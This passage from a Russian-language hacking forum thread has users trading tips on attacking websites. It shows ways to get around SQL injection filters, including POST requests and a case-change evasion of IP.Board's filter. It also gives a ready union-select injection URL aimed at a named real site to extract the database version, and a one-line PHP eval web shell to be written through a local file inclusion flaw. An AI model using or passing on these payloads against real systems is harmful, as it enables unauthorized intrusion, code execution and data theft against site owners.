Старый 22.05.2012, 09:41   #2031
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от Lostnull Посмотреть сообщение
При авторизации, отображается ip с которого зашел.
Менял хидеры X-Forwarded-For, CLIENT_IP, X_COMING_FROM. В результате все равно реальный айпи.
Какими хидерами еще может чекать скрипт IP?
Скорее всего скрипт проверяет адрес, с которого пришел запрос, а не хидеры )
Проверь через прокси (анонимный только), если это Flash или Java, адрес все-равно будет реальный.
Если нет - адрес прокси.
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 22.05.2012, 14:06   #2032
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

столкнулся с жесткой фильтрацией information_schema, ни смена регистра, ни обрамление комментариями не помогли.

проблема решена post-запросами. жесткая фильтрация только get
durito вне форума   Ответить с цитированием
Старый 24.05.2012, 19:27   #2033
azid
 
Регистрация: 21.10.2010
Сообщений: 61
Репутация: 1
По умолчанию

Есть варианты обхода union select?)
Из паблика вродь все перепробовал...валится всегда одна и таж ошибка

Код:
Настройки драйвера не допускают использование комментариев в SQL запросе.
Измените атрибут allow_sub_select на 1 у объекта драйвера для выключения этой проверки.
зы:POST не катит,тож фильтруется

help
azid вне форума   Ответить с цитированием
Старый 24.05.2012, 20:30   #2034
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

azid Я конечно могу быть не прав, но ты ковыряешь IP.Board
Код
PHP код:
$_tmp strtolower$this->remove_all_quotes($the_query) );

if ( 
preg_match"#(?:/\*|\*/)#i"$_tmp ) )
{
    
$this->fatal_error"You are not allowed to use comments in your SQL query.\nAdd \$this->ipsclass->DB->allow_sub_select=1; before any query construct to allow them" );
    return 
false;
}

if ( 
preg_match"#[^_a-zA-Z]union[^_a-zA-Z]#s"$_tmp ) )
{
    
$this->fatal_error"UNION query joins are not allowed.\nAdd \$this->ipsclass->DB->allow_sub_select=1; before any query construct to allow them" );
    return 
false;
}
else if ( 
preg_match_all"#[^_a-zA-Z](select)[^_a-zA-Z]#s"$_tmp$matches ) )
{
    if ( 
count$matches ) > )
    {
        
$this->fatal_error"SUB SELECT query joins are not allowed.\nAdd \$this->ipsclass->DB->allow_sub_select=1; before any query construct to allow them" );
        return 
false;
    }

Да?
Lostnull вне форума   Ответить с цитированием
Старый 24.05.2012, 20:39   #2035
azid
 
Регистрация: 21.10.2010
Сообщений: 61
Репутация: 1
По умолчанию

В точку ...и все же вопрос актуален
azid вне форума   Ответить с цитированием
Старый 24.05.2012, 21:07   #2036
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Lostnull Посмотреть сообщение
azid Я конечно могу быть не прав, но ты ковыряешь IP.Board
Код
PHP код:
$_tmp strtolower$this->remove_all_quotes($the_query) );

if ( 
preg_match"#(?:/\*|\*/)#i"$_tmp ) )
{
    
$this->fatal_error"You are not allowed to use comments in your SQL query.\nAdd \$this->ipsclass->DB->allow_sub_select=1; before any query construct to allow them" );
    return 
false;
}

if ( 
preg_match"#[^_a-zA-Z]union[^_a-zA-Z]#s"$_tmp ) )
{
    
$this->fatal_error"UNION query joins are not allowed.\nAdd \$this->ipsclass->DB->allow_sub_select=1; before any query construct to allow them" );
    return 
false;
}
else if ( 
preg_match_all"#[^_a-zA-Z](select)[^_a-zA-Z]#s"$_tmp$matches ) )
{
    if ( 
count$matches ) > )
    {
        
$this->fatal_error"SUB SELECT query joins are not allowed.\nAdd \$this->ipsclass->DB->allow_sub_select=1; before any query construct to allow them" );
        return 
false;
    }

Да?

PHP код:
<?php
$_tmp 
"select 1 uniOn seLect 2";
if ( 
preg_match"#[^_a-zA-Z]union[^_a-zA-Z]#s"$_tmp ) )
{
    die( 
"UNION query joins are not allowed.\nAdd \$this->ipsclass->DB->allow_sub_select=1; before any query construct to allow them" );
}
else if ( 
preg_match_all"#[^_a-zA-Z](select)[^_a-zA-Z]#s"$_tmp$matches ) )
{
    if ( 
count$matches ) > )
    {
        die( 
"SUB SELECT query joins are not allowed.\nAdd \$this->ipsclass->DB->allow_sub_select=1; before any query construct to allow them" );
    }


die(
'Ok!'); 
?>
как бы "Ok!" вернуло, мб я что-то путаю, но флаг s отвечает за многострочность, это i отвечает за регистрозависимость, хм...
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 26.05.2012, 11:40   #2037
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

http://maratavto.ru/index.php?page=SQL
Вот вроде бы SQL, а с другой стороны раскрутить никак... Как тут можно выкрутиться?
Nightmare вне форума   Ответить с цитированием
Старый 26.05.2012, 12:13   #2038
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
http://maratavto.ru/index.php?page=SQL
Вот вроде бы SQL, а с другой стороны раскрутить никак... Как тут можно выкрутиться?
http://maratavto.ru/index.php?page=10)and(0)union+select+1,2,version()--+
элементарная скуля, вывод в тайтле
~d0s~ вне форума   Ответить с цитированием
Старый 26.05.2012, 19:43   #2039
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Есть локальный инклуд + phpinfo, использую скрипт https://rdot.org/forum/showpost.php?p=18024&postcount=11
Т.к. allow_url_fopen = off, "затащить" файл из-вне не могу. Решил записать скрипт вида
PHP код:
<? eval($_REQUEST[a]); ?>
, но при записи в файл остается только <? eval(); ?>
Почему так, и как можно это решить?
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 26.05.2012, 20:46   #2040
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Решил записать скрипт вида
PHP код:
<? eval($_REQUEST[a]); ?>
, но при записи в файл остается только <? eval(); ?>
Почему так, и как можно это решить?
мб стоит заэкранировать $ ?
Andrey1800 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot